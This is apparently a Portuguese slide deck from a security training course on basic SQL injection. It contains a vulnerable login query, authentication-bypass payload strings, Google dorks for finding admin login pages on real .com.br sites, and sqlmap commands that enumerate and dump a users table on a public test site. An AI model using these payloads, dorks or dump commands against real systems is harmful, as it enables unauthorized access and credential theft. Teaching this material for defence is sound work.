Académique Documents
Professionnel Documents
Culture Documents
Temas de Hoje:
SQL Injection
Formao: Analise em Segurana da Informao SQL Injection Bsico
Tambm considerado SQL Injection o fato de enganar o form com uma falha de
programao.
var query = "SELECT * FROM usuarios WHERE login = '" + login +"' AND senha = '" + senha + "'" ;
SELECT * FROM usuarios WHERE login = ' ' ' AND password = '[password]' ;
Vamos supor que adicionamos aos campos de usurio e senha o seguinte item.
' or 1=1 -SELECT * FROM usuarios WHERE login = ' ' or 1=1- - ' AND senha = '[senha]';
DORK
inurl:"adm/index.asp" site:com.br
Outras Dorks:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
Variao de Strings:
admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1--
SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico
SQLMAP
SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico
Sqlmap uma ferramenta open source para penetration test que automatiza o
processo de deteco e exploiting de vulnerabilidades a Sqli Injection, escrita
em python e tem suporte tanto GNU linux ou windows.
O sqlmap alm de oferecer as funes para detectar e explorar as
vulnerabilidades a SQLI, ele consegue tambm tentar dominar o sistema de
banco de dados se for possivel.
SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico
--help
Mostra as opes do SQLMAP
--current-db
Apresenta o banco de dados atual
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
--banner
Pega o Banner do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
--dbs
Lista os bancos de dados do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico
--tables
Apresenta as tabelas do banco selecionado
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart --tables
--columns
Apresenta as colunas da tabela selecionada
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users --columns
--dump
Extrai as informaes da colunas selecionadas
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users -C 'uname,pass' --dump
SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico
--current-user
Apresenta o usurio ao qual a pgina est usando para se conectar ao banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-user
--is-dba
Verifica se o usurio atual administrador do Banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --is-dba
--users
Enumera todos os usurios
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --users
--search
Varre o banco atrs do que voc procura, pode ser um banco, tabela ou coluna
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --search C pass
www.eSecurity.com.br
E-mail: alan.sanches@esecurity.com.br
Fanpage: www.facebook.com/academiahacker